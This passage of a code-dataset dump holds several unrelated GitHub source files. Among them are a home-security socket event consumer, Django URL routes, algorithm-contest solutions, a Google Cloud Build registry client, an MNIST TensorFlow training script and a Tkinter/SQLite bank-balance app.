1=Request, 2=Response\n\t\t\t\t\tif hbType == 1:\n\t\t\t\t\t\tcSock.send(self.getHBResponse())\n\t\t\t\t\t\tcSock.close()\n\n\t\t\t\telif packetType == 2: # event\n\n\t\t\t\t\teventType = (event[0] & 0x30) >> 4\n\t\t\t\t\t\n\t\t\t\t\tseqNum = event[4] << 24\n\t\t\t\t\tseqNum = seqNum | (event[5] << 16)\n\t\t\t\t\tseqNum = seqNum | (event[6] << 8)\n\t\t\t\t\tseqNum = seqNum | event[7]\n\n\t\t\t\t\t# this is (I think) the earliest we can ACK the event\n\t\t\t\t\tcSock.send(self.getACK(eventType, seqNum))\n\t\t\t\t\tcSock.close()\n\n\t\t\t\t\te = Event(self.dbConfig, eventType, timeStarted, timeReceived, seqNum)\n\n\t\t\t\t\tuserID = event[1] >> 8\n\t\t\t\t\tuserID = userID | (event[2] & 0x0FF)\n\t\t\t\t\te.setUser(userID)\n\n\t\t\t\t\tsensors = [ False for _ in range(0,8) ]\n\t\t\t\t\tsensors[0] = ((event[3] & 128) >> 7) == 1\n\t\t\t\t\tsensors[1] = ((event[3] & 64) >> 6) == 1\n\t\t\t\t\tsensors[2] = ((event[3] & 32) >> 5) == 1\n\t\t\t\t\tsensors[3] = ((event[3] & 16) >> 4) == 1\n\t\t\t\t\tsensors[4] = ((event[3] & 8) >> 3) == 1\n\t\t\t\t\tsensors[5] = ((event[3] & 4) >> 2) == 1\n\t\t\t\t\tsensors[6] = ((event[3] & 2) >> 1) == 1\n\t\t\t\t\tsensors[7] = (event[3] & 1) == 1\n\t\t\t\t\te.setSensor(sensors)\n\n\t\t\t\t\tpictureType = event[0] & 0x0F\n\t\t\t\t\tif pictureSize:\n\t\t\t\t\t\tfilename = self.getImageName()\n\t\t\t\t\t\twith open(self.mediaDir + filename, 'wb') as f:\n\t\t\t\t\t\t\tfor i in range(0, pictureSize - 1):\n\t\t\t\t\t\t\t\tf.write(bytes([event[12 + i]]))\n\t\t\t\t\t\te.setImage(pictureType, pictureSize, filename)\n\n\t\t\t\t\t# Store record in db then print info to console\n\t\t\t\t\te.storeEvent()\n\t\t\t\t\tprint(e)\n\n\n\t\t\texcept sock_error as err:\n\t\t\t\tif err.errno != errno.ECONNRESET:\n\t\t\t\t\tprint(\"[Event Consumer] An unexpected socket error occured.\")\n\t\t\t\t\tprint(err)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[Event Consumer] Connection was reset, resuming to allow new connections.\")\n\t\t\t\t\tprint(\"[Event Consumer] %i bytes received before reset.\" % len(event))\n\n\n\n\n","repo_name":"BallisticBuddha/HomeSecurityProject","sub_path":"HSS_Server/EventConsumer.py","file_name":"EventConsumer.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20710829861","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n path(\"\", views.starting_page, name=\"starting-page\"),\r\n path(\"new-car\", views.add_car, name=\"add-car\"),\r\n path('car/', views.car_details, name=\"car-detail\"),\r\n path('car/delete/', views.delete_car, name='delete-car'),\r\n path('refuel', views.refuel, name='refuel-car'),\r\n path('report', views.report, name='report'),\r\n path('service/done/', views.service_done, name=\"service-done\"),\r\n path('services', views.services, name=\"services\"),\r\n\r\n path('register', views.register_user, name=\"register\"),\r\n path('login', views.login_user, name=\"login\"),\r\n path('logout', views.logout_user, name=\"logout\"),\r\n \r\n]\r\n","repo_name":"kevinowski/fleet-management","sub_path":"cars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71347364250","text":"#https://www.acmicpc.net/problem/18111\nimport sys\n\nN, M, B = map(int, sys.stdin.readline().split())\nground = []\nfor i in range(N):\n ground.extend(list(map(int, sys.stdin.readline().split())))\n\nmin_time = float('inf')\nmax_block = 0\n\nfor target_height in range(0, 257):\n time = 0\n block_needed = 0\n block_save = 0\n for height in ground:\n if height > target_height:\n time += (height - target_height) * 2\n block_save += height - target_height \n elif height < target_height:\n time += target_height - height\n block_needed += target_height - height\n if block_save + B < block_needed:\n continue\n if time < min_time:\n min_time = time\n max_block = target_height\n elif time == min_time:\n max_block = max(target_height, max_block)\nprint(min_time, max_block)\n\n#https://www.acmicpc.net/problem/11723\nclass Set():\n def __init__(self):\n self.s = {}\n for i in range(1, 21):\n self.s[i] = False\n \n def ft_add(self, x):\n self.s[x] = True\n \n def ft_remove(self, x):\n self.s[x] = False\n \n def ft_check(self, x):\n if self.s[x]:\n print(1)\n else:\n print(0)\n \n def ft_toggle(self, x):\n if self.s[x]:\n self.s[x] = False\n else:\n self.s[x] = True\n \n def ft_all(self):\n for i in range(1, 21):\n self.s[i] = True\n \n def ft_empty(self):\n for i in range(1, 21):\n self.s[i] = False\n\nimport sys\n\nM = int(input())\n\ns = Set()\nfor i in range(0, M):\n command = list(map(str, sys.stdin.readline().split()))\n if command[0] == \"add\":\n s.ft_add(int(command[1]))\n elif command[0] == \"check\":\n s.ft_check(int(command[1]))\n elif command[0] == \"remove\":\n s.ft_remove(int(command[1]))\n elif command[0] == \"toggle\":\n s.ft_toggle(int(command[1]))\n elif command[0] == \"all\":\n s.ft_all()\n elif command[0] == \"empty\":\n s.ft_empty()\n\n#https://www.acmicpc.net/problem/11399\nimport sys\n\nN = int(input())\ntime = list(map(int, sys.stdin.readline().split()))\ntime.sort()\n\nmin_time = 0\nfor i in range(len(time)):\n min_time += time[i] * (len(time) - i)\nprint(min_time)\n\n#https://www.acmicpc.net/problem/17219\nimport sys\n\nN, M = map(int, sys.stdin.readline().split())\npasswords = {}\nfor i in range(N):\n site, password = map(str, sys.stdin.readline().strip().split())\n passwords[site] = password\n\nfor i in range(M):\n site = sys.stdin.readline().strip()\n print(passwords[site])","repo_name":"SUNMI-KIM/algorithm_workbook","sub_path":"backjoon/2023_05_25.py","file_name":"2023_05_25.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"6884184127","text":"from sregistry.logger import bot\nfrom sregistry.main import ApiConnection\nimport json\nimport os\n\nfrom retrying import retry\nimport google\nimport platform\nfrom google.cloud import storage\nfrom googleapiclient.discovery import build as discovery_build\nfrom oauth2client.client import GoogleCredentials\n\nfrom .build import (\n build,\n build_repo,\n build_status,\n run_build,\n finish_build,\n submit_build,\n load_build_config,\n)\nfrom .delete import delete, destroy\nfrom .logs import logs, list_logs, print_log\nfrom .pull import pull\nfrom .push import push, upload\nfrom .query import container_query, list_containers, search, search_all\n\n\nclass Client(ApiConnection):\n # Custom variables that can be provided with client.get_client\n envars = {}\n\n def __init__(self, secrets=None, base=None, init=True, **kwargs):\n self._update_secrets()\n self._update_headers()\n\n # Do we need storage client now?\n if init is True:\n self._init_client()\n\n super(Client, self).__init__(**kwargs)\n\n def _speak(self):\n \"\"\"add the bucket name to be printed to the user at appropriate times\"\"\"\n bot.info(\"[bucket][%s]\" % self._bucket_name)\n\n def _update_secrets(self):\n \"\"\"The user is required to have an application secrets file in his\n or her environment. The information isn't saved to the secrets\n file, but the client exists with error if the variable isn't found.\n \"\"\"\n env = \"GOOGLE_APPLICATION_CREDENTIALS\"\n self._secrets = self._get_and_update_setting(env, self.envars.get(env))\n if not self._secrets:\n bot.exit(\"You must export %s to use Google Storage client\" % env)\n\n def _init_client(self):\n \"\"\"init client will check if the user has defined a bucket that\n differs from the default, use the application credentials to\n get the bucket, and then instantiate the client.\n \"\"\"\n\n # Get storage and compute services\n self._get_services()\n\n env = \"SREGISTRY_GOOGLE_STORAGE_BUCKET\"\n self._bucket_name = self._get_and_update_setting(env, self.envars.get(env))\n\n # If the user didn't set in environment, use default\n if not self._bucket_name:\n fallback_name = os.environ.get(\"USER\", platform.node())\n self._bucket_name = \"sregistry-gcloud-build-%s\" % fallback_name\n\n # The build bucket is for uploading .tar.gz files\n self._build_bucket_name = \"%s_cloudbuild\" % self._bucket_name\n\n # Main storage bucket for containers, and dependency bucket with targz\n self._bucket = self._get_bucket(self._bucket_name)\n self._build_bucket = self._get_bucket(self._build_bucket_name)\n\n def _get_services(self, version=\"v1\"):\n \"\"\"get version 1 of the google compute and storage service\n\n Parameters\n ==========\n version: version to use (default is v1)\n \"\"\"\n self._bucket_service = storage.Client()\n creds = GoogleCredentials.get_application_default()\n self._storage_service = discovery_build(\"storage\", version, credentials=creds)\n self._build_service = discovery_build(\"cloudbuild\", version, credentials=creds)\n\n def _get_bucket(self, bucket_name):\n \"\"\"get a bucket based on a bucket name. If it doesn't exist, create it.\n\n Parameters\n ==========\n bucket_name: the name of the bucket to get (or create). 
It should\n        not contain google, and should be all lowercase with -\n        or underscores.\n        \"\"\"\n\n        # Case 1: The bucket already exists\n        try:\n            bucket = self._bucket_service.get_bucket(bucket_name)\n\n        # Case 2: The bucket needs to be created\n        except google.cloud.exceptions.NotFound:\n            bucket = self._bucket_service.create_bucket(bucket_name)\n\n        # Case 3: The bucket name is already taken\n        except:\n            bot.exit(\"Cannot get or create %s, is the name taken?\" % bucket_name)\n\n        return bucket\n\n    def _get_project(self, project=None):\n        \"\"\"get project returns the active project, and exits if not found.\n\n        Parameters\n        ==========\n        project: a project to default to, if not found in the environment\n        zone: a default zone, will be us-west1-a by default\n\n        \"\"\"\n        if project is None:\n            project = self.envars.get(\"SREGISTRY_GOOGLE_PROJECT\")\n\n        return self._get_and_update_setting(\"SREGISTRY_GOOGLE_PROJECT\", project)\n\n    def _get_zone(self, zone=\"us-west1-a\"):\n        \"\"\"get zone returns the zone set in the environment, or the default\n\n        Parameters\n        ==========\n        zone: a default zone, will be us-west1-a by default\n\n        \"\"\"\n        return self._get_and_update_setting(\"SREGISTRY_GOOGLE_ZONE\", zone)\n\n\nClient.pull = pull\nClient.push = push\nClient._upload = upload\nClient.delete = delete\nClient.destroy = destroy\n\n# Build functions\nClient.build = build\nClient.build_repo = build_repo\nClient._run_build = run_build\nClient._finish_build = finish_build\nClient._build_status = build_status\nClient._submit_build = submit_build\nClient._load_build_config = load_build_config\n\nClient.search = search\nClient._search_all = search_all\nClient._container_query = container_query\nClient._list_containers = list_containers\n","repo_name":"singularityhub/sregistry-cli","sub_path":"sregistry/main/google_build/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"71882989852","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # only print Error messages; 0: print everything\n\n# implement the forward pass manually\n# ================ step1 data prepared ================\n# datasets: the data-management utility that keras provides\n# x: [60k, 28, 28],\n# y: [60k]\n(x, y), (x_test, y_test) = datasets.mnist.load_data()\n# numpy 2 tensor\n# x: [0~255] => [0~1.]\nx = tf.convert_to_tensor(x, dtype=tf.float32) / 255. # a range of -1~1 is easier to optimize\ny = tf.convert_to_tensor(y, dtype=tf.int32)\nx_test = tf.convert_to_tensor(x_test, dtype=tf.float32) / 255. # a range of -1~1 is easier to optimize\ny_test = tf.convert_to_tensor(y_test, dtype=tf.int32)\nprint(x.shape, x.dtype)\nprint(y.shape, y.dtype)\nprint(tf.reduce_min(x), tf.reduce_max(x))\nprint(tf.reduce_min(y), tf.reduce_max(y))\n\n# build Dataset objects so one batch can be drawn at a time\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y)).batch(128)\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(128)\n# peek into train_db\ntrain_iter = iter(train_db)\nprint(train_iter)\nsample = next(train_iter) # take out one batch of the training set, (samples,labels) => ([b,28,28],[b])\nprint('one batch:', sample[0].shape, sample[1].shape)\n# peek into train_db\n\n# ================ step2 create variables ================\n# model : [b, 784] => [b, 256] => [b, 128] => [b, 10]\n# declare the trainable parameters. They must be wrapped in tf.Variable(), otherwise their gradient values are not kept when gradients are computed\n# w:[dim_in, dim_out], b:[dim_out]\nw1 = tf.Variable(tf.random.truncated_normal([784, 256], stddev=0.1)) # the initial values matter a lot!! Large initial weights lead to divergence or very slow convergence; very small initial weights are recommended.\nb1 = tf.Variable(tf.zeros([256]))\nw2 = tf.Variable(tf.random.truncated_normal([256, 128], stddev=0.1))\nb2 = tf.Variable(tf.zeros([128]))\nw3 = tf.Variable(tf.random.truncated_normal([128, 10], stddev=0.1))\nb3 = tf.Variable(tf.zeros([10]))\n\nlr = 1e-3 # learning rate\n\n# ================ step3 build and train model ================\nfor epoch in range(50): # iterate db for 10. Since every epoch trains on the same training set, the achievable optimization has an upper bound; the core of deep learning is still Big Data\n    for step, (x, y) in enumerate(train_db): # step: which batch this is\n        # x:[128, 28, 28]\n        # y: [128]\n        # [b, 28, 28] => [b, 28*28]\n        x = tf.reshape(x, [-1, 28 * 28]) # the first layer is fully connected and its nodes form a 1-D vector, so the image must be flattened into a 1-D vector first\n\n        with tf.GradientTape() as tape: # context that automatically computes gradients for the parameters\n            # x: [b, 28*28]\n            # h1 = x@w1 + b1\n            # [b, 784]@[784, 256] + [256] => [b, 256] + [256] => [b, 256] + [b, 256]\n            h1 = x @ w1 + b1 # automatic broadcasting, equivalent to + tf.broadcast_to(b1,[x.shape[0],256])\n            h1 = tf.nn.relu(h1)\n            # [b, 256] => [b, 128]\n            h2 = h1 @ w2 + b2\n            h2 = tf.nn.relu(h2)\n            # [b, 128] => [b, 10]\n            out = h2 @ w3 + b3 # the last layer usually uses no activation, or sigmoid\n\n            # ================ step4 compute loss ================\n            # out: [b, 10]\n            # y: [b] => [b, 10]\n            y_onehot = tf.one_hot(y, depth=10) # depth is the number of classes. Training minimizes the loss, which is computed against one-hot labels, so one-hot is needed for training but not for test/validation\n            # mse = mean(sum(y-out)^2)\n            # [b, 10]\n            loss = tf.square(y_onehot - out)\n            loss = tf.reduce_mean(loss) # ==> sum the loss matrix, then divide by b*10, turning it into a scalar\n\n        # ================ step5 compute variables ================\n        grads = tape.gradient(loss, [w1, b1, w2, b2, w3, b3])\n        # ================ step6 update gradients ================\n        # w1 = w1 - lr * w1_grad\n        w1.assign_sub(lr * grads[0]) # note: do not use w1 = w1 - lr*grads[0] here, it would turn w1 back into a plain tensor instead of a Variable, so gradients could no longer be recorded\n        b1.assign_sub(lr * grads[1])\n        w2.assign_sub(lr * grads[2])\n        b2.assign_sub(lr * grads[3])\n        w3.assign_sub(lr * grads[4])\n        b3.assign_sub(lr * grads[5])\n\n        if step % 100 == 0:\n            print(epoch, step, 'loss:', float(loss))\n\n    # test/evaluation: check model accuracy under the current parameters. The forward pass is the same as in training, only no loss is computed and y_test needs no one-hot encoding\n    # [w1, b1, w2, b2, w3, b3]\n    total_correct, total_num = 0, 0\n    for step, (x, y) in enumerate(test_db):\n        # y: the raw class labels\n        # preprocessing: flatten the images [b, 28, 28] => [b, 28*28]\n        x = tf.reshape(x, [-1, 28 * 28])\n        # forward pass [b, 784] => [b, 256] => [b, 128] => [b, 10]\n        h1 = tf.nn.relu(x @ w1 + b1)\n        h2 = tf.nn.relu(h1 @ w2 + b2)\n        out = h2 @ w3 + b3\n        # out: [b, 10] ~ R\n        # prob: [b, 10] ~ [0, 1]\n        # convert the outputs to probability values\n        prob = tf.nn.softmax(out, axis=1) # softmax also guarantees the probabilities sum to 1\n        # [b, 10] => [b]\n        # int64!!!\n        # predicted classes, to be compared with y\n        pred = tf.argmax(prob, axis=1)\n        pred = tf.cast(pred,dtype=tf.int32) # a type cast is needed because y is int32; otherwise tf.equal() fails\n        correct = tf.reduce_sum(tf.cast(tf.equal(pred, y),dtype=tf.int32))\n\n        total_correct += 
int(correct) # tensor --> python int\n total_num += x.shape[0]\n\n acc = total_correct / total_num\n print(\"test acc:\", acc)\n","repo_name":"tp-yan/PycharmProject","sub_path":"ForTensorFlow2/05DataLoad/03evaluate_acc.py","file_name":"03evaluate_acc.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10280567453","text":"from nltk import FreqDist\nfrom nltk.corpus import words\n\npuzzle_letters = FreqDist('egivrvonl')\n\nobligatory = 'r'\n\nwordlist = words.words()\n\nresult = [w for w in wordlist if len(w) > 5 and obligatory in w and FreqDist(w) <= puzzle_letters]\n\nprint(result)\n","repo_name":"katalogoc/librarian","sub_path":"src/egivrvonl.py","file_name":"egivrvonl.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25163183446","text":"#!/usr/bin/env python3\n\nimport time, serial\nimport threading as th\nimport configparser as cp\n# -- system --\nfrom core.utils import sysUtils\nfrom core.redisOps import redisOps\nfrom core.logutils import logUtils\nfrom core.meterInfoData import meterInfoData\nfrom ommslib.shared.core.datatypes import redisDBIdx, readStatus\n\n\nclass pzemRedisBot(th.Thread):\n\n def __init__(self, SYS_INI: cp.ConfigParser, redops: redisOps):\n super().__init__()\n self.sys_ini: cp.ConfigParser = SYS_INI\n self.sec: cp.SectionProxy = self.sys_ini[\"PZEM\"]\n self.dev: str = self.sec.get(\"SERIAL_DEV\", \"/dev/ttyUSB0\")\n self.baudrate: int = self.sec.getint(\"SERIAL_BAUDRATE\", 19200)\n self.syspath_channel = self.sec.get(\"SYSPATH_CHANNEL\")\n tmp: str = self.sec.get(\"DIAG_TAG\")\n self.diag_tag = sysUtils.set_systag(tmp)\n self.ser: serial.Serial = serial.Serial(port=self.dev, baudrate=self.baudrate)\n self.redops: redisOps = redops\n self.start_dts_dts_utc = sysUtils.dts_utc()\n self.last_msg_dts_utc = \"\"\n self.m_info: meterInfoData = \\\n meterInfoData(\"e1\", \"Peacefair\", \"PZEM-004T AC 100A\")\n self.first_reads: [] = []\n\n def run(self):\n pub_channel: str = self.sec.get(\"REDIS_PUB_CHNL\")\n pub_channel = sysUtils.set_systag(pub_channel)\n _dict = {\"boot_dts_utc\": sysUtils.dts_utc(), \"dev\": self.dev\n , \"lan_ip\": sysUtils.lan_ip(), \"hostname\": sysUtils.HOST\n , \"pub_reads_channel\": pub_channel}\n self.redops.update_edge_diag(self.diag_tag, mapdct=_dict, restart=True)\n while True:\n self.__run_loop()\n\n def __read_string(self) -> str:\n barr: bytearray = bytearray()\n while True:\n __char = self.ser.read()\n # -- start char --\n if chr(__char[0]) == '#':\n barr.clear()\n barr.extend(__char)\n # -- test end --\n if chr(__char[0]) == '!':\n break\n # -- --\n return barr.decode(\"utf-8\")\n\n def __run_loop(self):\n try:\n # -- -- -- -- -- -- -- -- -- -- -- --\n CHANNEL = \"PZEM\"\n buff = None\n time.sleep(0.48)\n if self.ser.inWaiting():\n buff = self.__read_string()\n # -- -- -- -- -- -- -- -- -- -- -- --\n if buff is None:\n return\n # -- -- -- -- -- -- -- -- -- -- -- --\n if buff.startswith(\"#\") and buff.endswith(\"!\"):\n __dict = {\"last_msg_dts_utc\": sysUtils.dts_utc(), \"last_msg\": buff}\n self.redops.update_edge_diag(diag_tag=self.diag_tag, mapdct=__dict)\n # -- -- -- -- -- -- -- -- -- -- -- --\n print(buff)\n if not buff.startswith(\"#RPT|PZEM:SS_\"):\n return\n # -- -- -- -- -- -- -- -- -- -- -- --\n arr: [] = buff.split(\"|\")\n arr[0] = \"#RPT:kWhrs\"\n pzem_ss = arr[1].split(\":\")[1]\n arr.insert(1, 
f\"DTSUTC:{sysUtils.dts_utc()}\")\n arr.insert(2, f\"EPOCH:{sysUtils.dts_epoch()}\")\n syspath: str = sysUtils.syspath(self.syspath_channel, pzem_ss)\n arr.insert(3, f\"PATH:{syspath}\")\n buff = \"|\".join(arr)\n # -- -- publish & set -- --\n dtsutc, epoch = sysUtils.dtsutc_epoch()\n _d: {} = {\"#RPT_kWhrs_STATUS\": f\"{dtsutc} | {epoch} | {readStatus.READ_OK}\"\n , \"#RPT_kWhrs\": f\"[{buff[:-1]}]\"\n , \"CHANNEL_TYPE\": CHANNEL\n , \"LAST_READ\": f\"#RPT_kWhrs | {readStatus.READ_OK} | {sysUtils.dts_utc(with_tz=True)}\"\n , self.m_info.red_key: str(self.m_info)}\n # -- -- -- -- -- -- -- --\n if syspath not in self.first_reads:\n self.redops.red.select(redisDBIdx.DB_IDX_READS.value)\n self.redops.red.delete(syspath)\n self.first_reads.append(syspath)\n # -- -- -- -- -- -- -- --\n self.redops.save_meter_data(syspath, _dict=_d)\n self.redops.pub_read_on_sec(\"PZEM\", _buff=f\"({buff[:-1]})\")\n # -- -- -- -- -- -- -- -- -- -- -- --\n except Exception as e:\n logUtils.log_exp(e)\n time.sleep(2.0)\n","repo_name":"ErikOwsiak/omms-edge","sub_path":"core/pzemRedisBot.py","file_name":"pzemRedisBot.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1587627835","text":"#/usr/bin/python\n\n#identify open reading frames, start/stop codons\n\n#import glob\nimport os,sys\n#import numpy\n\n#os.chdir(\"C:/Users/mshpak/Desktop/Covid_19/April_15_MSA\")\n\ndef main(file): \n input_filename = file\n\n seq_file = open(input_filename, \"r\")\n new_seq_file = open(input_filename.split(\".\")[0]+\"_new_name_file\", \"w\") #create file with new sequence names\n table_for_dict = open(input_filename.split(\".\")[0]+\"_name_dict_file\", \"w\") #tab-separated table with temporary name and sequence name\n seq_name_dict = {}\n\n allseq = ''\n index_for_dict = 0\n seq_identify = []\n for line in seq_file:\n #line = line.upper()\n #line = line.rstrip('\\n')\n if 'HCOV' in line or '>' in line:\n index_for_dict = index_for_dict + 1\n ind_name = '>seq_' + str(index_for_dict)\n seq_name_dict.update({ind_name: line.rstrip('\\n')})\n new_seq_file.write(ind_name + '\\n')\n table_for_dict.write(ind_name + '\t' + line)\n else:\n new_seq_file.write(line)\n allseq = allseq + line\n\n new_seq_file.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"wonaya/covid_workflow","sub_path":"scripts/Shorten_Sequence_name.py","file_name":"Shorten_Sequence_name.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8140973561","text":"import sys\r\ninput = sys.stdin.readline\r\nfrom collections import deque\r\n\r\nN, K = map(int, input().split())\r\nbelt = deque(list(map(int, input().split())))\r\nrobot = [0] * N # N-1위치에서 로봇 내림\r\n\r\nzero_cnt = 0\r\nanswer = 0\r\n\r\nwhile True:\r\n answer += 1\r\n\r\n # [1] 벨트 이동, 로봇 회전 / 로봇 내림\r\n belt.appendleft(belt.pop())\r\n robot = [0] + robot[:-1]\r\n robot[N-1] = 0\r\n\r\n # [2] 로봇여부 판단, 로봇 우측이동\r\n for i in range(N-2, 0, -1):\r\n if robot[i] == 1 and robot[i+1] == 0 and belt[i+1] > 0:\r\n robot[i], robot[i+1] = 0, 1\r\n belt[i+1] -= 1\r\n if belt[i+1] == 0:\r\n zero_cnt += 1\r\n\r\n # [3] 로봇 올리기\r\n if belt[0] > 0:\r\n robot[0] = 1\r\n belt[0] -= 1\r\n if belt[0] == 0:\r\n zero_cnt += 1\r\n\r\n # [4] 0개수 판단\r\n if zero_cnt >= K:\r\n break\r\n\r\nprint(answer)","repo_name":"Semibro/Baekjoon","sub_path":"백준/Gold/20055. 
컨베이어 벨트 위의 로봇/컨베이어 벨트 위의 로봇.py","file_name":"컨베이어 벨트 위의 로봇.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2498163344","text":"from Tkinter import *\nimport sqlite3\nimport time\n\nconn = sqlite3.connect( 'transactions.db' )\nc = conn.cursor()\n\nroot = Tk()\n\n#Initialize the Record table & set initial Amount = 0\nc.execute(\"CREATE TABLE IF NOT EXISTS Record(DateTime TEXT, Amount REAL, Note TEXT, Balance REAL);\")\n\ndef deposit(): \n global newBalance, amount\n #Call convertRaw function\n convertRaw() \n \n #Add deposit value to the current balance and get current time\n amount = float( add.get() ) \n newBalance = amount + currentBalance \n entryTime = time.ctime()\n \n #Call runSql to add a new entry to database\n runSql( \"INSERT INTO Record VALUES( '{0}', '{1}', '{2}', '{3}' )\".format( entryTime, amount, addNote.get(), newBalance ) )\n conn.commit()\n\n # Call showEntries to show updated list of transactions\n showEntries()\n\n cbEntry.delete( 0, END )\n cbEntry.insert( 0, newBalance )\n\n # Clear the deposit entries\n depEntry.delete( 0, END )\n dnEntry.delete( 0, END )\n\n return newBalance, amount\n \n\ndef withdrawl():\n # Call convertRaw to get balance from database\n convertRaw()\n # Setting global variables to 0 before assigning new values\n newBalance = 0\n amount = 0\n # Change amount to negative value and calculate newBalance\n amount = float( minus.get() ) * -1 \n newBalance = amount + currentBalance\n\n entryTime = time.ctime()\n \n #Call runSql to add a new entry to database\n runSql( \"INSERT INTO Record VALUES( '{0}', '{1}', '{2}', '{3}' )\".format( entryTime, amount, minusNote.get(), newBalance ) )\n conn.commit()\n\n showEntries()\n\n cbEntry.delete( 0, END )\n cbEntry.insert( 0, newBalance ) \n \n # Clear the withdrawl entries \n witEntry.delete( 0, END )\n wnEntry.delete( 0, END )\n\n return newBalance, amount\n\n\n# Function to change the memory location retrieved from database into a useful number\ndef convertRaw():\n global currentBalance \n currentBalance = 0\n #Get current balance from database and change it into a useful number\n cb = c.execute( \"SELECT SUM( Amount ) FROM Record\" ) \n rawBalance = [ c.fetchone() ] \n w = str( rawBalance ) \n x = w[ 2 : ( len( w ) - 3 ) ] \n currentBalance = float( x ) \n\n return currentBalance\n\n\n# Function to run sql command and then call showEntries()\ndef runSql( cmd ):\n x = c.execute( cmd )\n conn.commit() \n \n \n# Function to display the database\ndef showEntries():\n global entries\n ptBox.delete( 0, END )\n tranList = c.execute ( \"SELECT DateTime, Amount, Note, Balance FROM Record WHERE Balance != 0 ORDER BY DateTime DESC\" )\n entries = tranList.fetchall()\n for DateTime, Amount, Note, Balance in entries:\n ptBox.insert( END, 'NEW ENTRY', DateTime, Amount, Note, Balance, '----------' )\n\n\nif \"SELECT COUNT(*) FROM Record = 0\":\n c.execute( \"INSERT INTO Record VALUES( null, 0, 'Initialize', 0)\" )\n\n# Function to make GUI window\ndef makeWindow():\n\n global add, minus, addNote, minusNote, ptBox, cbEntry, depEntry, dnEntry, witEntry, wnEntry\n\n win = Toplevel( root )\n win.title( 'Bank Account Balance' )\n\n topFrame = Frame( win )\n topFrame.pack()\n\n #Current Balance Label and Entry\n cbLabel = Label( topFrame, text = 'Your Current Balance Is: ', padx = 3 )\n cbLabel.grid( row = 1, column = 0 )\n\n cbEntry = Entry( topFrame )\n cbEntry.grid( row = 1, column = 1 )\n\n #Button to add to balance, 
entry for doing it \n depButton = Button( topFrame, text = 'Deposit', command = deposit )\n depButton.grid( row = 2, column = 0, padx = 5, pady = 2 )\n\n add = StringVar()\n depEntry = Entry( topFrame, textvariable = add )\n depEntry.grid( row = 2, column = 1, padx = 2 )\n\n #label and entry for deposit note \n dnLabel = Label( topFrame, text = 'Deposit Note: ', padx = 5 )\n dnLabel.grid( row = 3, column = 0 )\n\n addNote = StringVar()\n dnEntry = Entry( topFrame, textvariable= addNote )\n dnEntry.grid( row = 3, column = 1, padx = 2 )\n\n #Button to withdraw, entry for doing it \n witButton = Button( topFrame, text = 'Withdrawl', command = withdrawl )\n witButton.grid( row = 5, column = 0, padx = 5, pady = 2 )\n\n minus = StringVar()\n witEntry = Entry( topFrame, textvariable = minus )\n witEntry.grid( row = 5, column = 1, padx = 2 )\n\n #label and entry for withdrawl note \n wnLabel = Label( topFrame, text = 'Withdrawl Note: ', padx = 5 )\n wnLabel.grid( row = 6, column = 0 )\n\n minusNote = StringVar()\n wnEntry = Entry( topFrame, textvariable = minusNote )\n wnEntry.grid( row = 6, column = 1, padx = 2 )\n\n\n bottomFrame = Frame( win )\n bottomFrame.pack()\n\n #label and listbox to display past transactions\n ptLabel = Label( bottomFrame, text = 'Past Transactions:', padx = 5, pady = 2 )\n ptLabel.grid( row = 8, column = 0, pady = 2 ) \n\n ptBox = Listbox( bottomFrame, width = 30, height = 12 )\n ptBox.grid( row = 9, column = 0, padx = 2 ) \n \n scrollbar = Scrollbar( bottomFrame, orient = VERTICAL )\n scrollbar.grid( row = 9, column = 1, sticky = NS )\n scrollbar.configure( command = ptBox.yview ) \n\n ptBox.configure( yscrollcommand = scrollbar.set )\n \n return win\n\n\nwin = makeWindow()\nwin.mainloop()","repo_name":"william-stanford/PythonFinalProject","sub_path":"PythonFinalProject/PythonFinalProject.py","file_name":"PythonFinalProject.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}